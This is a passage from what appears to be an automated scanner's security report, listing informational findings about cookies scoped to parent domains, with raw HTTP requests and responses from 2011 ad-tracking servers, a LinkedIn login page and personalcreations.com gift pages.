Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; ANRTT=; Tsid=0^1315097086^1315098886|17778^1315097086^1315098886; TData=99999|^; N=2:b2269f69029173967deb3f16e3a72f92; ATTAC=a3ZzZWc9OTk5OTk6; eadx=x

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:05:45 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 01:20:45 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; path=/; expires=Wed, 29-Aug-12 01:05:45 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:05:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1315097086^1315100145|17778^1315097086^1315098886|11684^1315097306^1315100145; path=/; expires=Sun, 04-Sep-11 01:35:45 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:05:45 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 102
Content-Type: application/x-javascript
Content-Length: 102

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='1765ifu1akkc79';
var ANSL='99999|^';
ANRTXR();


11.48. http://tags.bluekai.com/site/4195

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /site/4195

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site/4195?id=b6f4436ac614b0358d75&?tm=915580 HTTP/1.1
Host: tags.bluekai.com
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_4&protocol=http%3A&network=sacbee%3Ablogs_sacbee
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bkp1=; bku=3yG99saNUAf9465B; bkou=KJye999999W=; bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACX9O76Byy==; bk=myAUzYJX+9Fze1lp; bkc=KJhnasHQmYdOh1O6vLZwARsO/Hc/UX3J0G2CRRepol9p1nOh1enzwT7QbhG0GwOObZaXBuYt3tPQt9wA16c8RP0Gda96wAQdMcX/S1CbvxSsY3C8/wTbBe8/wRyFOUEFUMTZOoFpzxQIn0o4xGTOCxdueIBdTtaQrY7ehOY6OLWdT1i/y+I1hrXlxKV4PAckmlR0GwOO2LcT7YYdEt5QuYoaX9XtGdn5ske8/OgsUylAq2b10g5rHKVefWrWXQs3akys; bko=KJpgaVaQRe3P814/zWTRhonkRt9/VCw7hX/QYVDh1x99gXz/vx==; bkw5=KJypLs/9QAX1JT9A1TMJy1MyMS44CJcO0hRCyTQi/tucAsaYAUspOfWdxzVxjz05zzkAOpWymeaXRhOxOT7Bi9u8Q81no/SE0b6OHO8LjZOGYXvkF0xW3adMsT1mDJiPTD/G5F69ctTQdQ==; bkdc=sf; bklc=4e62ca02

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:13:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=4e62d0a8; expires=Tue, 06-Sep-2011 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bk=R+zBw0JX+9Fze1lp; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkc=KJh5ppXnxPWROFe77YEdRf+Jag/jk/tDhVCxEanrn529VjuuyVHHwGsJsm8vRzBQBFAvJGwJKUWbFUzT7UfNFm2pMC1cMZIO8XVruNCyke121n52h+6Wzn1Aon/9FkTsruZFwxXedGe9Tt0znTYjX+G85uoeRcKZFo2q/KbZhpuF4PJn+AkQXB2cl7C1KKtAKrXIJksI5R0MlaRSpeuFdRG928HWRtNX39oZNIBjA4rS8S8myDh2tAcbIyvyIXqc1U5+hWtl2Agj5qknWtf3bdf29EhDj89=; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkst=KJhMRjMYpzYQym9UAJTqPa3RqJCr7Zd3ZKL4RmGHajZUkN/RbZBoks4G5F2AACXnxf/99T1/x8JjZGZJLPkiLoZCujvOLSkaig7oiQ+J4Q9iBHVZ; expires=Fri, 02-Mar-2012 01:13:12 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Mon, 05-Sep-2011 01:13:12 GMT; path=/; domain=.bluekai.com
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Expires: Mon, 05 Sep 2011 01:13:12 GMT
Cache-Control: max-age=86400, private
BK-Server: 160f
Content-Length: 62
Content-Type: image/gif

GIF89a.............!..NETSCAPE2.0.....!..    ....,...........L..;

11.49. http://tr.adinterax.com/re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /re/mcclatchyinteractive%2CSAC_ccul_110425_brand_exp%2CC%3DSAC_CCUL%2CP%3DSAC%2CK%3D696749/0.17714067571796477/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://blogs.sacbee.com/the_state_worker/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:13 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxid=01345f4e62cacd40; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Set-Cookie: adxf=696749@1@221; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

11.50. http://tu.connect.wunderloop.net/TU/1/1/1/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tu.connect.wunderloop.net
Path:   /TU/1/1/1/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TU/1/1/1/ HTTP/1.1
Host: tu.connect.wunderloop.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:10 GMT
Server: Apache
P3P: policyref="http://connect.wunderloop.net/w3c/p3p.xml", CP="NOI PSAa PSDa OUR IND UNI CNT"
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 31 Oct 1989 14:06:29 GMT
Last-Modified: Thu, 31 Oct 1989 14:06:29 GMT
Set-Cookie: wlid=id%3Aa_6f76e8d5cf024e8471d7df3851e5a9fc%3A; expires=Wed, 29-Aug-2012 00:48:10 GMT; domain=.wunderloop.net; Path=/
X-Cnection: close
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

11.51. http://www.bizographics.com/collect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&url=reuters.com&pid=501 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
Cache-Control: max-age=0
If-Modified-Since: Thu, 04 Aug 2011 17:51:39 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
If-None-Match: "221d8352905f2c38b3cb2bd191d630b0"
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KXs4bdFipkUfSaj5XcunNcMDa7Re6IGD4lBvQyxxHPmw0Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQD6vWJNOjnJHrfysIJUvFEEVUJBxdqAyCnhnIK7WDp3tGB8GRrS9YqGZ21tipbuEa4ipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Sun, 04 Sep 2011 00:48:10 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=6439dd87-a6df-42d4-8c18-e9c26d5d40b4; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Set-Cookie: BizoData=Pp1FHRK43ZweORIlfkWqu9Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZiiM5m7MKDWeaj5XcunNcMDa7Re6IGD4lFbK4oBwEGr9Ad6xyMUDLG6hh7sErqHyaoEyKUrunjtqgDfn74jNwcPJZXKAa9DdLgeLHSyEVCqewehdQ95muedOoesP2U0B4uSKJipWuwJodXwOG6Ckz6TNNGdaF6nEbrp2RisySjMfspmIzmbswoNZ5qPldy6c1wwH4DELwm2ipwN9AFjATkbkUDTbwiiAhQOisLU5UVO9T0RLQPyXdljTHnfyBp1sJ7Vvkc46t01cWfT12ipyKbm8481vVAn4t3h6RTVissytDGtO0HVbGfbrxfWf6nc4wINO1L7830xNl7tETxisz59RGoQec9s3m5pebWcHCAieie; Domain=.bizographics.com; Expires=Sun, 04-Mar-2012 12:48:10 GMT; Path=/
Content-Length: 0
Connection: keep-alive


11.52. https://www.linkedin.com/secure/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.linkedin.com
Path:   /secure/login

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:92Y5C7-Duxr1zGVs1Wv1YxDhPErhhqpepcYFrtwDfIrhAIVsQxwMUh:1315099155:0c843f0a96a8006c044aa7d63d7ac676a0c1e9e0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:49:14 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:19:15 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965c45525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:51:45 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>


<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

11.53. http://www.personalcreations.com/apparel-gifts-her-PHERAPP

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /apparel-gifts-her-PHERAPP

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /apparel-gifts-her-PHERAPP HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:25 PM?0&9/3/2011 6:27:59 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:46 PM?0&9/3/2011 6:28:53 PM?0&9/3/2011 6:29:28 PM?0&9/3/2011 6:30:05 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:30:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:30:04 GMT
Connection: close
Content-Length: 280083

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.54. http://www.personalcreations.com/grandparents-day-gifts-PGDPDAY

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /grandparents-day-gifts-PGDPDAY

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /grandparents-day-gifts-PGDPDAY HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:40 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:40 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:41 GMT
Connection: close
Content-Length: 243187

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.55. http://www.personalcreations.com/halloween-home-decorations-PHALHOM

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /halloween-home-decorations-PHALHOM

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /halloween-home-decorations-PHALHOM HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:49 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:49 GMT
Connection: close
Content-Length: 201184

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.56. http://www.personalcreations.com/just-because-gifts-PJBEBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /just-because-gifts-PJBEBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /just-because-gifts-PJBEBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=?0&9/3/2011 6:23:53 PM?0&9/3/2011 6:24:05 PM?0&9/3/2011 6:24:33 PM?0&9/3/2011 6:25:01 PM?0&9/3/2011 6:24:49 PM?0&9/3/2011 6:25:00 PM?0&9/3/2011 6:25:19 PM?0&9/3/2011 6:26:43 PM?0&9/3/2011 6:26:58 PM?0&9/3/2011 6:27:20 PM?0&9/3/2011 6:27:30 PM?0&9/3/2011 6:27:56 PM?0&9/3/2011 6:27:14 PM?0&9/3/2011 6:27:54 PM?0&9/3/2011 6:28:09 PM?0&9/3/2011 6:28:10 PM?0&9/3/2011 6:28:30 PM?0&9/3/2011 6:28:03 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:28:03 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:28:04 GMT
Connection: close
Content-Length: 413498

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.57. http://www.personalcreations.com/personalized-anniversary-gifts-PANNBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-anniversary-gifts-PANNBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-anniversary-gifts-PANNBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:19:35 PM?0&9/3/2011 6:19:10 PM?0&9/3/2011 6:19:46 PM?0&9/3/2011 6:19:48 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:48 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:48 GMT
Connection: close
Content-Length: 381211

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.58. http://www.personalcreations.com/personalized-back-to-school-gifts-PBKDB2S

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-back-to-school-gifts-PBKDB2S

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-back-to-school-gifts-PBKDB2S HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:49 PM?0&9/3/2011 6:19:56 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:56 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:56 GMT
Connection: close
Content-Length: 259186

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.59. http://www.personalcreations.com/personalized-birthday-gifts-PBIRBSL

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-birthday-gifts-PBIRBSL

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-birthday-gifts-PBIRBSL HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=50.23.123.106&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
Set-Cookie: PCR_SelectedProducts=; path=/
Set-Cookie: ProductDetail_RecentlyViewed_PCR=0&9/3/2011 6:18:20 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:18:58 PM?0&9/3/2011 6:18:56 PM?0&9/3/2011 6:19:02 PM?0&9/3/2011 6:18:30 PM?0&9/3/2011 6:19:16 PM?0&9/3/2011 6:19:07 PM?0&9/3/2011 6:18:35 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:18:39 PM?0&9/3/2011 6:19:01 PM?0&9/3/2011 6:18:42 PM?0&9/3/2011 6:18:45 PM?0&9/3/2011 6:19:17 PM?0&9/3/2011 6:18:53 PM?0&9/3/2011 6:19:08 PM?0&9/3/2011 6:19:13 PM?0&9/3/2011 6:20:03 PM?0&9/3/2011 6:19:51 PM?0&9/3/2011 6:19:27 PM?0&9/3/2011 6:19:46 PM&; domain=.personalcreations.com; expires=Sat, 03-Dec-2011 02:19:46 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 01:19:46 GMT
Connection: close
Content-Length: 411135

<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pcr_common.css?siteversionnumber=2011.08.31.1' rel='stylesheet' type='text/css' /><link href='http://a1128.g.ak
...[SNIP]...

11.60. http://www.personalcreations.com/personalized-birthday-gifts-her-PHERBIR

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.personalcreations.com
Path:   /personalized-birthday-gifts-her-PHERBIR

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /personalized-birthday-gifts-her-PHERBIR HTTP/1.1
Host: www.personalcreations.com
Accept: */*
Accept-Language: en
